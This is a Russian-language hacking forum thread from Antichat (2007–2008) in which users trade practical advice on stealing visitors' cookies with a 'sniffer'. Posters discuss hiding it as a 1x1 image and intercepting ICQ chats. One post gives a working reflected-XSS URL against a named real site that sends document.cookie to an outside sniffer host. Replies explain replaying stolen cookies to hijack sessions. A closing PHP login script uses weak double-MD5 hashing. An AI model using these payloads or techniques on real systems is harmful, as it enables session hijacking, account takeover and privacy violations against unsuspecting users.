Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
20.12.2007, 15:35
|
UID: 46374
USER: k10n
Новичок
Регистрация: 12.12.2007
Сообщений: 6
Провел на форуме:
79524
Репутация:
0
|
|
Одни вопросы,но сто пудова даже ни кто не прочитал элементарной понятной даже слону https://forum.antichat.ru/thread20140.html.
|
|
|
21.12.2007, 23:12
|
UID: 23655
USER: Chakir
Познающий
Регистрация: 17.04.2006
Сообщений: 47
Провел на форуме:
605976
Репутация:
14
|
|
как то кидал автору в асю пару едеек по поиску и бану сказал что будет всё как время будет
а время будет не скоро =)
|
|
|
|
26.12.2007, 15:38
|
UID: 47019
USER: tamao
Новичок
Регистрация: 26.12.2007
Сообщений: 2
Провел на форуме:
12388
Репутация:
5
|
|
как использовать сниффер на странице, поняла - картинку вставляешь.... так же, как понимаю, на форумах - в сообщение вставлять картинку????
а в чатах? тупо ссылку на сниффер? чел пройдет, выйдет на картинку размером 1на1???? а еще слышала, что можно перехватывать icq-переписку... расскажите, кто занет.
ЗЫ. огромное спасипо за отличный сниффер)))))))
|
|
|
|
04.01.2008, 21:13
|
UID: 47019
USER: tamao
Новичок
Регистрация: 26.12.2007
Сообщений: 2
Провел на форуме:
12388
Репутация:
5
|
|
Пара вопросо, извините(
Time: 03.01 -04.21.17 //число.месяц - час.минуты.секунды??
IP: ***
Host: ***
Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; C40; MRA 4.10 (build 01952)) //ие определяется как мозилла??
String:
nuid=****//О_о а какого сайта это куки? предыдущего или настоящего??
по статистике народ.ру на сайт заходит порядком больше человек, чем согласно снифферу. может ли посетитель не регистрироваться сниффером, если у него отключены картинки броузером?? могут ли быть еще какие-нибудь причины?
Последний раз редактировалось tamao; 06.01.2008 в 14:49..
|
|
|
|
20.01.2008, 20:43
|
UID: 31729
USER: DreamDiver
Новичок
Регистрация: 13.01.2007
Сообщений: 10
Провел на форуме:
68958
Репутация:
1
|
|
Подскажите плз, чем расшифровать полученные куки? а то весь вечер мучаюсь... весь поиск переюзал, не могу найти негде( как и что(
|
|
|
|
23.01.2008, 22:15
|
UID: 48549
USER: aerodrome
Новичок
Регистрация: 20.01.2008
Сообщений: 1
Провел на форуме:
27885
Репутация:
0
|
|
помогите разобраться,при переходе по ссылке http://dump.ru/search.php?filename='"></script>'"><scRIPt>alert(document.cookie)</sCRIPT> выдаются мои куки, а сылка http://dump.ru/search.php?filename='"></script>'"><scRIPt>img = new Image(); img.src = "http://s.netsec.ru/логин.gif?"+document.cookie;</sCRIPT>, как я понял из вышенаписанного должна (если я по ней перехожу) отправлять мои куки на сниффер, а туда почему-то вообще ничего не приходит, даже айпи! почему так????
|
|
|
|
10.02.2008, 00:06
|
UID: 38522
USER: NApoleonchik
Участник форума
Регистрация: 04.07.2007
Сообщений: 111
Провел на форуме:
486797
Репутация:
102
|
|
1
поскажите как можно расшифровать cookie ну или хотябы их себе подставить. заранее спасибо, плюсом не обижу
|
|
|
|
10.02.2008, 00:09
|
UID: 38611
USER: Conquerstador
Banned
Регистрация: 07.07.2007
Сообщений: 152
Провел на форуме:
511131
Репутация:
52
|
|
Сообщение от DreamDiver
Подскажите плз, чем расшифровать полученные куки? а то весь вечер мучаюсь... весь поиск переюзал, не могу найти негде( как и что(
Их не надо расшифровивать их надо вставлять в куки к себе!
|
|
|
|
10.02.2008, 00:14
|
UID: 38522
USER: NApoleonchik
Участник форума
Регистрация: 04.07.2007
Сообщений: 111
Провел на форуме:
486797
Репутация:
102
|
|
Сообщение от Conquerstador
Их не надо расшифровивать их надо вставлять в куки к себе!
Это уже хорошо, подскажите нам ламерам как 
|
|
|
|
10.02.2008, 01:12
|
UID: 47552
USER: cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036
Репутация:
1334
|
|
Если я не ошибаюсь это можно сделать так
register.php
PHP код:
<?
// Страница регситрации нового пользователя
# Соединямся с БД
mysql_connect("localhost", "myhost", "myhost");
mysql_select_db("testtable");
if(isset($_POST['submit']))
{
$err = array();
# проверям логин
if(!preg_match("/^[a-zA-Z0-9]+$/",$_POST['login']))
{
$err[] = "Логин может состоять только из букв английского алфавита и цифр";
}
if(strlen($_POST['login']) < 3 or strlen($_POST['login']) > 30)
{
$err[] = "Логин должен быть не меньше 3-х символов и не больше 30";
}
# проверяем, не сущестует ли пользователя с таким именем
$query = mysql_query("SELECT COUNT(user_id) FROM users WHERE user_login='".mysql_real_escape_string($_POST['login'])."'");
if(mysql_result($query, 0) > 0)
{
$err[] = "Пользователь с таким логином уже существует в базе данных";
}
# Если нет ошибок, то добавляем в БД нового пользователя
if(count($err) == 0)
{
$login = $_POST['login'];
# Убераем лишние пробелы и делаем двойное шифрование
$password = md5(md5(trim($_POST['password'])));
mysql_query("INSERT INTO users SET user_login='".$login."', user_password='".$password."'");
header("Location: login.php"); exit();
}
else
{
print "<b>При регистрации произошли следующие ошибки:</b><br>";
foreach($err AS $error)
{
print $error."<br>";
}
}
}
?>
<form method="POST">
Логин <input name="login" type="text"><br>
Пароль <input name="password" type="password"><br>
<input name="submit" type="submit" value="Зарегистрироваться">
</form>
login.php
PHP код:
<?
// Страница авторизации
# Функция для генерации случайной строки
function generateCode($length=6) {
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHI JKLMNOPRQSTUVWXYZ0123456789";
$code = "";
$clen = strlen($chars) - 1;
while (strlen($code) < $length) {
$code .= $chars[mt_rand(0,$clen)];
}
return $code;
}
# Соединямся с БД
mysql_connect("localhost", "myhost", "myhost");
mysql_select_db("testtable");
if(isset($_POST['submit']))
{
# Вытаскиваем из БД запись, у которой логин равняеться введенному
$query = mysql_query("SELECT user_id, user_password FROM users WHERE user_login='".mysql_real_escape_string($_POST['login'])."' LIMIT 1");
$data = mysql_fetch_assoc($query);
# Соавниваем пароли
if($data['user_password'] === md5(md5($_POST['password'])))
{
# Генерируем случайное число и шифруем его
$hash = md5(generateCode(10));
if(!@$_POST['not_attach_ip'])
{
# Если пользователя выбрал привязку к IP
# Переводим IP в строку
$insip = ", user_ip=INET_ATON('".$_SERVER['REMOTE_ADDR']."')";
}
# Записываем в БД новый хеш авторизации и IP
mysql_query("UPDATE users SET user_hash='".$hash."' ".$insip." WHERE user_id='".$data['user_id']."'");
# Ставим куки
setcookie("id", $data['user_id'], time()+60*60*24*30);
setcookie("hash", $hash, time()+60*60*24*30);
# Переадресовываем браузер на страницу проверки нашего скрипта
header("Location: check.php"); exit();
}
else
{
print "Вы ввели неправильный логин/пароль";
}
}
?>
<form method="POST">
Логин <input name="login" type="text"><br>
Пароль <input name="password" type="password"><br>
Не прикреплять к IP(не безопасно) <input type="checkbox" name="not_attach_ip"><br>
<input name="submit" type="submit" value="Войти">
</form>
check.php
PHP код:
<?
// Скрипт проверки
# Соединямся с БД
mysql_connect("localhost", "myhost", "myhost");
mysql_select_db("testtable");
if (isset($_COOKIE['id']) and isset($_COOKIE['hash']))
{
$query = mysql_query("SELECT *,INET_NTOA(user_ip) FROM users WHERE user_id = '".intval($_COOKIE['id'])."' LIMIT 1");
$userdata = mysql_fetch_assoc($query);
if(($userdata['user_hash'] !== $_COOKIE['hash']) or ($userdata['user_id'] !== $_COOKIE['id'])
or (($userdata['user_ip'] !== $_SERVER['REMOTE_ADDR']) and ($userdata['user_ip'] !== "0")))
{
setcookie("id", "", time() - 3600*24*30*12, "/");
setcookie("hash", "", time() - 3600*24*30*12, "/");
print "Хм, что-то не получилось";
}
else
{
print "Привет, ".$userdata['user_login'].". Всё работает!";
}
}
else
{
print "Включите куки";
}
?>
Для защиты формы логина от перебора, можно использовать капчу. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
